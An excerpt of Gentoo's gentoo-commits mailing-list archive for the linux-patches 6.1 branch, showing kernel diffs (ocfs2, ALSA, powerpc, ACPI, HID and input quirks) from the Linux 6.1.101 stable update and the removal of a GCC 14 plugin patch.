+@@ -1869,7 +1877,8 @@ static int ocfs2_dir_foreach_blk_el(struct inode *inode,
+ 		while (ctx->pos < i_size_read(inode)
+ 		       && offset < sb->s_blocksize) {
+ 			de = (struct ocfs2_dir_entry *) (bh->b_data + offset);
+-			if (!ocfs2_check_dir_entry(inode, de, bh, offset)) {
++			if (!ocfs2_check_dir_entry(inode, de, bh, bh->b_data,
++						   sb->s_blocksize, offset)) {
+ 				/* On error, skip the f_pos to the
+ 				   next block. */
+ 				ctx->pos = (ctx->pos | (sb->s_blocksize - 1)) + 1;
+@@ -3341,7 +3350,7 @@ static int ocfs2_find_dir_space_id(struct inode *dir, struct buffer_head *di_bh,
+ 	struct super_block *sb = dir->i_sb;
+ 	struct ocfs2_dinode *di = (struct ocfs2_dinode *)di_bh->b_data;
+ 	struct ocfs2_dir_entry *de, *last_de = NULL;
+-	char *de_buf, *limit;
++	char *first_de, *de_buf, *limit;
+ 	unsigned long offset = 0;
+ 	unsigned int rec_len, new_rec_len, free_space;
+ 
+@@ -3354,14 +3363,16 @@ static int ocfs2_find_dir_space_id(struct inode *dir, struct buffer_head *di_bh,
+ 	else
+ 		free_space = dir->i_sb->s_blocksize - i_size_read(dir);
+ 
+-	de_buf = di->id2.i_data.id_data;
++	first_de = di->id2.i_data.id_data;
++	de_buf = first_de;
+ 	limit = de_buf + i_size_read(dir);
+ 	rec_len = OCFS2_DIR_REC_LEN(namelen);
+ 
+ 	while (de_buf < limit) {
+ 		de = (struct ocfs2_dir_entry *)de_buf;
+ 
+-		if (!ocfs2_check_dir_entry(dir, de, di_bh, offset)) {
++		if (!ocfs2_check_dir_entry(dir, de, di_bh, first_de,
++					   i_size_read(dir), offset)) {
+ 			ret = -ENOENT;
+ 			goto out;
+ 		}
+@@ -3443,7 +3454,8 @@ static int ocfs2_find_dir_space_el(struct inode *dir, const char *name,
+ 			/* move to next block */
+ 			de = (struct ocfs2_dir_entry *) bh->b_data;
+ 		}
+-		if (!ocfs2_check_dir_entry(dir, de, bh, offset)) {
++		if (!ocfs2_check_dir_entry(dir, de, bh, bh->b_data, blocksize,
++					   offset)) {
+ 			status = -ENOENT;
+ 			goto bail;
+ 		}
+diff --git a/sound/core/pcm_dmaengine.c b/sound/core/pcm_dmaengine.c
+index e299e8634751f..62489677f3947 100644
+--- a/sound/core/pcm_dmaengine.c
++++ b/sound/core/pcm_dmaengine.c
+@@ -352,8 +352,12 @@ EXPORT_SYMBOL_GPL(snd_dmaengine_pcm_open_request_chan);
+ int snd_dmaengine_pcm_sync_stop(struct snd_pcm_substream *substream)
+ {
+ 	struct dmaengine_pcm_runtime_data *prtd = substream_to_prtd(substream);
++	struct dma_tx_state state;
++	enum dma_status status;
+ 
+-	dmaengine_synchronize(prtd->dma_chan);
++	status = dmaengine_tx_status(prtd->dma_chan, prtd->cookie, &state);
++	if (status != DMA_PAUSED)
++		dmaengine_synchronize(prtd->dma_chan);
+ 
+ 	return 0;
+ }
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 66b8adb2069af..e0df44bfda4e6 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9928,6 +9928,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x10cf, 0x1845, "Lifebook U904", ALC269_FIXUP_LIFEBOOK_EXTMIC),
+ 	SND_PCI_QUIRK(0x10ec, 0x10f2, "Intel Reference board", ALC700_FIXUP_INTEL_REFERENCE),
+ 	SND_PCI_QUIRK(0x10ec, 0x118c, "Medion EE4254 MD62100", ALC256_FIXUP_MEDION_HEADSET_NO_PRESENCE),
++	SND_PCI_QUIRK(0x10ec, 0x119e, "Positivo SU C1400", ALC269_FIXUP_ASPIRE_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x10ec, 0x11bc, "VAIO VJFE-IL", ALC269_FIXUP_LIMIT_INT_MIC_BOOST),
+ 	SND_PCI_QUIRK(0x10ec, 0x1230, "Intel Reference board", ALC295_FIXUP_CHROME_BOOK),
+ 	SND_PCI_QUIRK(0x10ec, 0x124c, "Intel Reference board", ALC295_FIXUP_CHROME_BOOK),
+@@ -9941,6 +9942,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x144d, 0xc189, "Samsung Galaxy Flex Book (NT950QCG-X716)", ALC298_FIXUP_SAMSUNG_AMP),
+ 	SND_PCI_QUIRK(0x144d, 0xc18a, "Samsung Galaxy Book Ion (NP930XCJ-K01US)", ALC298_FIXUP_SAMSUNG_AMP),
+ 	SND_PCI_QUIRK(0x144d, 0xc1a3, "Samsung Galaxy Book Pro (NP935XDB-KC1SE)", ALC298_FIXUP_SAMSUNG_AMP),
++	SND_PCI_QUIRK(0x144d, 0xc1a4, "Samsung Galaxy Book Pro 360 (NT935QBD)", ALC298_FIXUP_SAMSUNG_AMP),
+ 	SND_PCI_QUIRK(0x144d, 0xc1a6, "Samsung Galaxy Book Pro 360 (NP930QBD)", ALC298_FIXUP_SAMSUNG_AMP),
+ 	SND_PCI_QUIRK(0x144d, 0xc740, "Samsung Ativ book 8 (NP870Z5G)", ALC269_FIXUP_ATIV_BOOK_8),
+ 	SND_PCI_QUIRK(0x144d, 0xc812, "Samsung Notebook Pen S (NT950SBE-X58)", ALC298_FIXUP_SAMSUNG_AMP),


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-07-25 12:15 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-07-25 12:15 UTC (permalink / raw
  To: gentoo-commits

commit:     b095c1112333de93151068a47233a53baa9b2e2b
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Jul 25 12:15:21 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Jul 25 12:15:21 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=b095c111

Remove redundant patch

Removed:
2940_handle-gcc-14-last-stmt-rename.patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                               |  4 ----
 2940_handle-gcc-14-last-stmt-rename.patch | 31 -------------------------------
 2 files changed, 35 deletions(-)

diff --git a/0000_README b/0000_README
index 9ad98dff..ad9ca363 100644
--- a/0000_README
+++ b/0000_README
@@ -479,10 +479,6 @@ Patch:  2920_sign-file-patch-for-libressl.patch
 From:   https://bugs.gentoo.org/717166
 Desc:   sign-file: full functionality with modern LibreSSL
 
-Patch:  2940_handle-gcc-14-last-stmt-rename.patch
-From:   https://lore.kernel.org/all/20230811060545.never.564-kees@kernel.org/#Z31scripts:gcc-plugins:gcc-common.h
-Desc:   gcc-plugins: Rename last_stmt() for GCC 14+
-
 Patch:  2950_kbuild-CRC32-1MB-dict-xz-modules.patch
 From:   https://git.kernel.org/pub/scm/linux/kernel/git/masahiroy/linux-kbuild.git/commit/?h=kbuild&id=fbf5892df21a8ccfcb2fda0fd65bc3169c89ed28
 Desc:   kbuild: Use CRC32 and a 1MiB dictionary for XZ compressed modules

diff --git a/2940_handle-gcc-14-last-stmt-rename.patch b/2940_handle-gcc-14-last-stmt-rename.patch
deleted file mode 100644
index b04ce8da..00000000
--- a/2940_handle-gcc-14-last-stmt-rename.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From: Kees Cook <keescook@chromium.org>
-To: linux-hardening@vger.kernel.org
-Cc: Kees Cook <keescook@chromium.org>, linux-kernel@vger.kernel.org
-Subject: [PATCH] gcc-plugins: Rename last_stmt() for GCC 14+
-Date: Thu, 10 Aug 2023 23:05:49 -0700	[thread overview]
-Message-ID: <20230811060545.never.564-kees@kernel.org> (raw)
-
-In GCC 14, last_stmt() was renamed to last_nondebug_stmt(). Add a helper
-macro to handle the renaming.
-
-Cc: linux-hardening@vger.kernel.org
-Signed-off-by: Kees Cook <keescook@chromium.org>
----
- scripts/gcc-plugins/gcc-common.h | 4 ++++
- 1 file changed, 4 insertions(+)
-
-diff --git a/scripts/gcc-plugins/gcc-common.h b/scripts/gcc-plugins/gcc-common.h
-index 84c730da36dd..1ae39b9f4a95 100644
---- a/scripts/gcc-plugins/gcc-common.h
-+++ b/scripts/gcc-plugins/gcc-common.h
-@@ -440,4 +440,8 @@ static inline void debug_gimple_stmt(const_gimple s)
- #define SET_DECL_MODE(decl, mode)	DECL_MODE(decl) = (mode)
- #endif
- 
-+#if BUILDING_GCC_VERSION >= 14000
-+#define last_stmt(x)			last_nondebug_stmt(x)
-+#endif
-+
- #endif
--- 
-2.34.1


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-07-25 12:09 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-07-25 12:09 UTC (permalink / raw
  To: gentoo-commits

commit:     ffea8e5a422b2de097bb0f5ec35ab03df8b3a177
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Jul 25 12:09:41 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Jul 25 12:09:41 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=ffea8e5a

Linux patch 6.1.101

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README              |    4 +
 1100_linux-6.1.101.patch | 3620 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 3624 insertions(+)

diff --git a/0000_README b/0000_README
index 2650897a..9ad98dff 100644
--- a/0000_README
+++ b/0000_README
@@ -443,6 +443,10 @@ Patch:  1099_linux-6.1.100.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.100
 
+Patch:  1100_linux-6.1.101.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.101
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1100_linux-6.1.101.patch b/1100_linux-6.1.101.patch
new file mode 100644
index 00000000..221608ca
--- /dev/null
+++ b/1100_linux-6.1.101.patch
@@ -0,0 +1,3620 @@
+diff --git a/Makefile b/Makefile
+index 54099eefe18ca..c2dc43c862dbf 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 100
++SUBLEVEL = 101
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/include/asm/uaccess.h b/arch/arm/include/asm/uaccess.h
+index 2fcbec9c306cf..d80a70dfac5c3 100644
+--- a/arch/arm/include/asm/uaccess.h
++++ b/arch/arm/include/asm/uaccess.h
+@@ -109,16 +109,6 @@ extern int __get_user_64t_1(void *);
+ extern int __get_user_64t_2(void *);
+ extern int __get_user_64t_4(void *);
+ 
+-#define __GUP_CLOBBER_1	"lr", "cc"
+-#ifdef CONFIG_CPU_USE_DOMAINS
+-#define __GUP_CLOBBER_2	"ip", "lr", "cc"
+-#else
+-#define __GUP_CLOBBER_2 "lr", "cc"
+-#endif
+-#define __GUP_CLOBBER_4	"lr", "cc"
+-#define __GUP_CLOBBER_32t_8 "lr", "cc"
+-#define __GUP_CLOBBER_8	"lr", "cc"
+-
+ #define __get_user_x(__r2, __p, __e, __l, __s)				\
+ 	   __asm__ __volatile__ (					\
+ 		__asmeq("%0", "r0") __asmeq("%1", "r2")			\
+@@ -126,7 +116,7 @@ extern int __get_user_64t_4(void *);
+ 		"bl	__get_user_" #__s				\
+ 		: "=&r" (__e), "=r" (__r2)				\
+ 		: "0" (__p), "r" (__l)					\
+-		: __GUP_CLOBBER_##__s)
++		: "ip", "lr", "cc")
+ 
+ /* narrowing a double-word get into a single 32bit word register: */
+ #ifdef __ARMEB__
+@@ -148,7 +138,7 @@ extern int __get_user_64t_4(void *);
+ 		"bl	__get_user_64t_" #__s				\
+ 		: "=&r" (__e), "=r" (__r2)				\
+ 		: "0" (__p), "r" (__l)					\
+-		: __GUP_CLOBBER_##__s)
++		: "ip", "lr", "cc")
+ #else
+ #define __get_user_x_64t __get_user_x
+ #endif
+diff --git a/arch/mips/kernel/syscalls/syscall_o32.tbl b/arch/mips/kernel/syscalls/syscall_o32.tbl
+index 7ab572040f534..20a6434f56361 100644
+--- a/arch/mips/kernel/syscalls/syscall_o32.tbl
++++ b/arch/mips/kernel/syscalls/syscall_o32.tbl
+@@ -27,7 +27,7 @@
+ 17	o32	break				sys_ni_syscall
+ # 18 was sys_stat
+ 18	o32	unused18			sys_ni_syscall
+-19	o32	lseek				sys_lseek
++19	o32	lseek				sys_lseek			compat_sys_lseek
+ 20	o32	getpid				sys_getpid
+ 21	o32	mount				sys_mount
+ 22	o32	umount				sys_oldumount
+diff --git a/arch/powerpc/kernel/eeh_pe.c b/arch/powerpc/kernel/eeh_pe.c
+index d2873d17d2b15..e4624d7896294 100644
+--- a/arch/powerpc/kernel/eeh_pe.c
++++ b/arch/powerpc/kernel/eeh_pe.c
+@@ -850,6 +850,7 @@ struct pci_bus *eeh_pe_bus_get(struct eeh_pe *pe)
+ {
+ 	struct eeh_dev *edev;
+ 	struct pci_dev *pdev;
++	struct pci_bus *bus = NULL;
+ 
+ 	if (pe->type & EEH_PE_PHB)
+ 		return pe->phb->bus;
+@@ -860,9 +861,11 @@ struct pci_bus *eeh_pe_bus_get(struct eeh_pe *pe)
+ 
+ 	/* Retrieve the parent PCI bus of first (top) PCI device */
+ 	edev = list_first_entry_or_null(&pe->edevs, struct eeh_dev, entry);
++	pci_lock_rescan_remove();
+ 	pdev = eeh_dev_to_pci_dev(edev);
+ 	if (pdev)
+-		return pdev->bus;
++		bus = pdev->bus;
++	pci_unlock_rescan_remove();
+ 
+-	return NULL;
++	return bus;
+ }
+diff --git a/arch/powerpc/kvm/book3s_64_vio.c b/arch/powerpc/kvm/book3s_64_vio.c
+index 40864373ef876..549e33d4ecd62 100644
+--- a/arch/powerpc/kvm/book3s_64_vio.c
++++ b/arch/powerpc/kvm/book3s_64_vio.c
+@@ -129,14 +129,16 @@ extern long kvm_spapr_tce_attach_iommu_group(struct kvm *kvm, int tablefd,
+ 	}
+ 	rcu_read_unlock();
+ 
+-	fdput(f);
+-
+-	if (!found)
++	if (!found) {
++		fdput(f);
+ 		return -EINVAL;
++	}
+ 
+ 	table_group = iommu_group_get_iommudata(grp);
+-	if (WARN_ON(!table_group))
++	if (WARN_ON(!table_group)) {
++		fdput(f);
+ 		return -EFAULT;
++	}
+ 
+ 	for (i = 0; i < IOMMU_TABLE_GROUP_MAX_TABLES; ++i) {
+ 		struct iommu_table *tbltmp = table_group->tables[i];
+@@ -157,8 +159,10 @@ extern long kvm_spapr_tce_attach_iommu_group(struct kvm *kvm, int tablefd,
+ 			break;
+ 		}
+ 	}
+-	if (!tbl)
++	if (!tbl) {
++		fdput(f);
+ 		return -EINVAL;
++	}
+ 
+ 	rcu_read_lock();
+ 	list_for_each_entry_rcu(stit, &stt->iommu_tables, next) {
+@@ -169,6 +173,7 @@ extern long kvm_spapr_tce_attach_iommu_group(struct kvm *kvm, int tablefd,
+ 			/* stit is being destroyed */
+ 			iommu_tce_table_put(tbl);
+ 			rcu_read_unlock();
++			fdput(f);
+ 			return -ENOTTY;
+ 		}
+ 		/*
+@@ -176,6 +181,7 @@ extern long kvm_spapr_tce_attach_iommu_group(struct kvm *kvm, int tablefd,
+ 		 * its KVM reference counter and can return.
+ 		 */
+ 		rcu_read_unlock();
++		fdput(f);
+ 		return 0;
+ 	}
+ 	rcu_read_unlock();
+@@ -183,6 +189,7 @@ extern long kvm_spapr_tce_attach_iommu_group(struct kvm *kvm, int tablefd,
+ 	stit = kzalloc(sizeof(*stit), GFP_KERNEL);
+ 	if (!stit) {
+ 		iommu_tce_table_put(tbl);
++		fdput(f);
+ 		return -ENOMEM;
+ 	}
+ 
+@@ -191,6 +198,7 @@ extern long kvm_spapr_tce_attach_iommu_group(struct kvm *kvm, int tablefd,
+ 
+ 	list_add_rcu(&stit->next, &stt->iommu_tables);
+ 
++	fdput(f);
+ 	return 0;
+ }
+ 
+diff --git a/arch/powerpc/platforms/pseries/setup.c b/arch/powerpc/platforms/pseries/setup.c
+index df07726192000..c2e6b3a0469d1 100644
+--- a/arch/powerpc/platforms/pseries/setup.c
++++ b/arch/powerpc/platforms/pseries/setup.c
+@@ -342,8 +342,8 @@ static int alloc_dispatch_log_kmem_cache(void)
+ {
+ 	void (*ctor)(void *) = get_dtl_cache_ctor();
+ 
+-	dtl_cache = kmem_cache_create("dtl", DISPATCH_LOG_BYTES,
+-						DISPATCH_LOG_BYTES, 0, ctor);
++	dtl_cache = kmem_cache_create_usercopy("dtl", DISPATCH_LOG_BYTES,
++						DISPATCH_LOG_BYTES, 0, 0, DISPATCH_LOG_BYTES, ctor);
+ 	if (!dtl_cache) {
+ 		pr_warn("Failed to create dispatch trace log buffer cache\n");
+ 		pr_warn("Stolen time statistics will be unreliable\n");
+diff --git a/arch/riscv/kernel/stacktrace.c b/arch/riscv/kernel/stacktrace.c
+index 0d3f00eb0baee..10e311b2759d3 100644
+--- a/arch/riscv/kernel/stacktrace.c
++++ b/arch/riscv/kernel/stacktrace.c
+@@ -32,6 +32,7 @@ void notrace walk_stackframe(struct task_struct *task, struct pt_regs *regs,
+ 			     bool (*fn)(void *, unsigned long), void *arg)
+ {
+ 	unsigned long fp, sp, pc;
++	int graph_idx = 0;
+ 	int level = 0;
+ 
+ 	if (regs) {
+@@ -68,7 +69,7 @@ void notrace walk_stackframe(struct task_struct *task, struct pt_regs *regs,
+ 			pc = regs->ra;
+ 		} else {
+ 			fp = frame->fp;
+-			pc = ftrace_graph_ret_addr(current, NULL, frame->ra,
++			pc = ftrace_graph_ret_addr(current, &graph_idx, frame->ra,
+ 						   &frame->ra);
+ 			if (pc == (unsigned long)ret_from_exception) {
+ 				if (unlikely(!__kernel_text_address(pc) || !fn(arg, pc)))
+diff --git a/drivers/acpi/ec.c b/drivers/acpi/ec.c
+index 77d1f2cb89ef3..7589908b358e3 100644
+--- a/drivers/acpi/ec.c
++++ b/drivers/acpi/ec.c
+@@ -1314,10 +1314,13 @@ acpi_ec_space_handler(u32 function, acpi_physical_address address,
+ 	if (ec->busy_polling || bits > 8)
+ 		acpi_ec_burst_enable(ec);
+ 
+-	for (i = 0; i < bytes; ++i, ++address, ++value)
++	for (i = 0; i < bytes; ++i, ++address, ++value) {
+ 		result = (function == ACPI_READ) ?
+ 			acpi_ec_read(ec, address, value) :
+ 			acpi_ec_write(ec, address, *value);
++		if (result < 0)
++			break;
++	}
+ 
+ 	if (ec->busy_polling || bits > 8)
+ 		acpi_ec_burst_disable(ec);
+@@ -1329,8 +1332,10 @@ acpi_ec_space_handler(u32 function, acpi_physical_address address,
+ 		return AE_NOT_FOUND;
+ 	case -ETIME:
+ 		return AE_TIME;
+-	default:
++	case 0:
+ 		return AE_OK;
++	default:
++		return AE_ERROR;
+ 	}
+ }
+ 
+diff --git a/drivers/block/null_blk/main.c b/drivers/block/null_blk/main.c
+index 220cedda2ca7d..4d78b5583dc6a 100644
+--- a/drivers/block/null_blk/main.c
++++ b/drivers/block/null_blk/main.c
+@@ -1958,8 +1958,8 @@ static int null_validate_conf(struct nullb_device *dev)
+ 		return -EINVAL;
+ 	}
+ 
+-	dev->blocksize = round_down(dev->blocksize, 512);
+-	dev->blocksize = clamp_t(unsigned int, dev->blocksize, 512, 4096);
++	if (blk_validate_block_size(dev->blocksize))
++		return -EINVAL;
+ 
+ 	if (dev->queue_mode == NULL_Q_MQ && dev->use_per_node_hctx) {
+ 		if (dev->submit_queues != nr_online_nodes)
+diff --git a/drivers/firmware/efi/libstub/zboot.lds b/drivers/firmware/efi/libstub/zboot.lds
+index 93d33f68333b2..a7fffbad6d46a 100644
+--- a/drivers/firmware/efi/libstub/zboot.lds
++++ b/drivers/firmware/efi/libstub/zboot.lds
+@@ -34,6 +34,7 @@ SECTIONS
+ 	}
+ 
+ 	/DISCARD/ : {
++		*(.discard .discard.*)
+ 		*(.modinfo .init.modinfo)
+ 	}
+ }
+diff --git a/drivers/gpio/gpio-pca953x.c b/drivers/gpio/gpio-pca953x.c
+index bf21803a00363..9ce54bf2030d7 100644
+--- a/drivers/gpio/gpio-pca953x.c
++++ b/drivers/gpio/gpio-pca953x.c
+@@ -768,6 +768,8 @@ static void pca953x_irq_bus_sync_unlock(struct irq_data *d)
+ 	int level;
+ 
+ 	if (chip->driver_data & PCA_PCAL) {
++		guard(mutex)(&chip->i2c_lock);
++
+ 		/* Enable latch on interrupt-enabled inputs */
+ 		pca953x_write_regs(chip, PCAL953X_IN_LATCH, chip->irq_mask);
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
+index cc8c1a48c5c4d..76df036fb2f34 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
+@@ -3338,6 +3338,9 @@ void dml32_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 							&mode_lib->vba.UrgentBurstFactorLumaPre[k],
+ 							&mode_lib->vba.UrgentBurstFactorChromaPre[k],
+ 							&mode_lib->vba.NotUrgentLatencyHidingPre[k]);
++
++					v->cursor_bw_pre[k] = mode_lib->vba.NumberOfCursors[k] * mode_lib->vba.CursorWidth[k][0] * mode_lib->vba.CursorBPP[k][0] /
++							8.0 / (mode_lib->vba.HTotal[k] / mode_lib->vba.PixelClock[k]) * v->VRatioPreY[i][j][k];
+ 				}
+ 
+ 				{
+diff --git a/drivers/gpu/drm/drm_panel_orientation_quirks.c b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+index 426bbee2d9f5e..5db52d6c5c35c 100644
+--- a/drivers/gpu/drm/drm_panel_orientation_quirks.c
++++ b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+@@ -202,6 +202,12 @@ static const struct dmi_system_id orientation_data[] = {
+ 		  DMI_MATCH(DMI_BOARD_NAME, "NEXT"),
+ 		},
+ 		.driver_data = (void *)&lcd800x1280_rightside_up,
++	}, {	/* AYA NEO KUN */
++		.matches = {
++		  DMI_EXACT_MATCH(DMI_BOARD_VENDOR, "AYANEO"),
++		  DMI_MATCH(DMI_BOARD_NAME, "KUN"),
++		},
++		.driver_data = (void *)&lcd1600x2560_rightside_up,
+ 	}, {	/* Chuwi HiBook (CWI514) */
+ 		.matches = {
+ 			DMI_MATCH(DMI_BOARD_VENDOR, "Hampoo"),
+diff --git a/drivers/gpu/drm/radeon/radeon_gem.c b/drivers/gpu/drm/radeon/radeon_gem.c
+index 75d79c3110389..3388a3d21d2c0 100644
+--- a/drivers/gpu/drm/radeon/radeon_gem.c
++++ b/drivers/gpu/drm/radeon/radeon_gem.c
+@@ -657,7 +657,7 @@ static void radeon_gem_va_update_vm(struct radeon_device *rdev,
+ 	if (r)
+ 		goto error_unlock;
+ 
+-	if (bo_va->it.start)
++	if (bo_va->it.start && bo_va->bo)
+ 		r = radeon_vm_bo_update(rdev, bo_va, bo_va->bo->tbo.resource);
+ 
+ error_unlock:
+diff --git a/drivers/gpu/drm/vmwgfx/Kconfig b/drivers/gpu/drm/vmwgfx/Kconfig
+index faddae3d6ac2e..6f1ac940cbae7 100644
+--- a/drivers/gpu/drm/vmwgfx/Kconfig
++++ b/drivers/gpu/drm/vmwgfx/Kconfig
+@@ -2,7 +2,7 @@
+ config DRM_VMWGFX
+ 	tristate "DRM driver for VMware Virtual GPU"
+ 	depends on DRM && PCI && MMU
+-	depends on X86 || ARM64
++	depends on (X86 && HYPERVISOR_GUEST) || ARM64
+ 	select DRM_TTM
+ 	select DRM_TTM_HELPER
+ 	select MAPPING_DIRTY_HELPERS
+diff --git a/drivers/hid/hid-ids.h b/drivers/hid/hid-ids.h
+index 97745a1f9c6f1..0e5b2b3dea4d0 100644
+--- a/drivers/hid/hid-ids.h
++++ b/drivers/hid/hid-ids.h
+@@ -417,6 +417,8 @@
+ #define I2C_DEVICE_ID_HP_SPECTRE_X360_13_AW0020NG  0x29DF
+ #define I2C_DEVICE_ID_ASUS_TP420IA_TOUCHSCREEN 0x2BC8
+ #define I2C_DEVICE_ID_ASUS_GV301RA_TOUCHSCREEN 0x2C82
++#define I2C_DEVICE_ID_ASUS_UX3402_TOUCHSCREEN 0x2F2C
++#define I2C_DEVICE_ID_ASUS_UX6404_TOUCHSCREEN 0x4116
+ #define USB_DEVICE_ID_ASUS_UX550VE_TOUCHSCREEN	0x2544
+ #define USB_DEVICE_ID_ASUS_UX550_TOUCHSCREEN	0x2706
+ #define I2C_DEVICE_ID_SURFACE_GO_TOUCHSCREEN	0x261A
+diff --git a/drivers/hid/hid-input.c b/drivers/hid/hid-input.c
+index 4ba5df3c1e039..b0091819fd58a 100644
+--- a/drivers/hid/hid-input.c
++++ b/drivers/hid/hid-input.c
+@@ -374,6 +374,10 @@ static const struct hid_device_id hid_battery_quirks[] = {
+ 	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_ASUS_GV301RA_TOUCHSCREEN),
+ 	  HID_BATTERY_QUIRK_IGNORE },
++	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_ASUS_UX3402_TOUCHSCREEN),
++	  HID_BATTERY_QUIRK_IGNORE },
++	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_ASUS_UX6404_TOUCHSCREEN),
++	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ELAN, USB_DEVICE_ID_ASUS_UX550_TOUCHSCREEN),
+ 	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ELAN, USB_DEVICE_ID_ASUS_UX550VE_TOUCHSCREEN),
+diff --git a/drivers/input/mouse/elantech.c b/drivers/input/mouse/elantech.c
+index 4e38229404b4b..b4723ea395eb9 100644
+--- a/drivers/input/mouse/elantech.c
++++ b/drivers/input/mouse/elantech.c
+@@ -1476,16 +1476,47 @@ static void elantech_disconnect(struct psmouse *psmouse)
+ 	psmouse->private = NULL;
+ }
+ 
++/*
++ * Some hw_version 4 models fail to properly activate absolute mode on
++ * resume without going through disable/enable cycle.
++ */
++static const struct dmi_system_id elantech_needs_reenable[] = {
++#if defined(CONFIG_DMI) && defined(CONFIG_X86)
++	{
++		/* Lenovo N24 */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "81AF"),
++		},
++	},
++#endif
++	{ }
++};
++
+ /*
+  * Put the touchpad back into absolute mode when reconnecting
+  */
+ static int elantech_reconnect(struct psmouse *psmouse)
+ {
++	int err;
++
+ 	psmouse_reset(psmouse);
+ 
+ 	if (elantech_detect(psmouse, 0))
+ 		return -1;
+ 
++	if (dmi_check_system(elantech_needs_reenable)) {
++		err = ps2_command(&psmouse->ps2dev, NULL, PSMOUSE_CMD_DISABLE);
++		if (err)
++			psmouse_warn(psmouse, "failed to deactivate mouse on %s: %d\n",
++				     psmouse->ps2dev.serio->phys, err);
++
++		err = ps2_command(&psmouse->ps2dev, NULL, PSMOUSE_CMD_ENABLE);
++		if (err)
++			psmouse_warn(psmouse, "failed to reactivate mouse on %s: %d\n",
++				     psmouse->ps2dev.serio->phys, err);
++	}
++
+ 	if (elantech_set_absolute_mode(psmouse)) {
+ 		psmouse_err(psmouse,
+ 			    "failed to put touchpad back into absolute mode.\n");
+diff --git a/drivers/input/serio/i8042-acpipnpio.h b/drivers/input/serio/i8042-acpipnpio.h
+index dfc6c581873b7..5b50475ec4140 100644
+--- a/drivers/input/serio/i8042-acpipnpio.h
++++ b/drivers/input/serio/i8042-acpipnpio.h
+@@ -76,7 +76,7 @@ static inline void i8042_write_command(int val)
+ #define SERIO_QUIRK_PROBE_DEFER		BIT(5)
+ #define SERIO_QUIRK_RESET_ALWAYS	BIT(6)
+ #define SERIO_QUIRK_RESET_NEVER		BIT(7)
+-#define SERIO_QUIRK_DIECT		BIT(8)
++#define SERIO_QUIRK_DIRECT		BIT(8)
+ #define SERIO_QUIRK_DUMBKBD		BIT(9)
+ #define SERIO_QUIRK_NOLOOP		BIT(10)
+ #define SERIO_QUIRK_NOTIMEOUT		BIT(11)
+@@ -1332,6 +1332,20 @@ static const struct dmi_system_id i8042_dmi_quirk_table[] __initconst = {
+ 		.driver_data = (void *)(SERIO_QUIRK_NOMUX | SERIO_QUIRK_RESET_ALWAYS |
+ 					SERIO_QUIRK_NOLOOP | SERIO_QUIRK_NOPNP)
+ 	},
++	{
++		/*
++		 * The Ayaneo Kun is a handheld device where some the buttons
++		 * are handled by an AT keyboard. The keyboard is usually
++		 * detected as raw, but sometimes, usually after a cold boot,
++		 * it is detected as translated. Make sure that the keyboard
++		 * is always in raw mode.
++		 */
++		.matches = {
++			DMI_EXACT_MATCH(DMI_BOARD_VENDOR, "AYANEO"),
++			DMI_MATCH(DMI_BOARD_NAME, "KUN"),
++		},
++		.driver_data = (void *)(SERIO_QUIRK_DIRECT)
++	},
+ 	{ }
+ };
+ 
+@@ -1655,7 +1669,7 @@ static void __init i8042_check_quirks(void)
+ 		if (quirks & SERIO_QUIRK_RESET_NEVER)
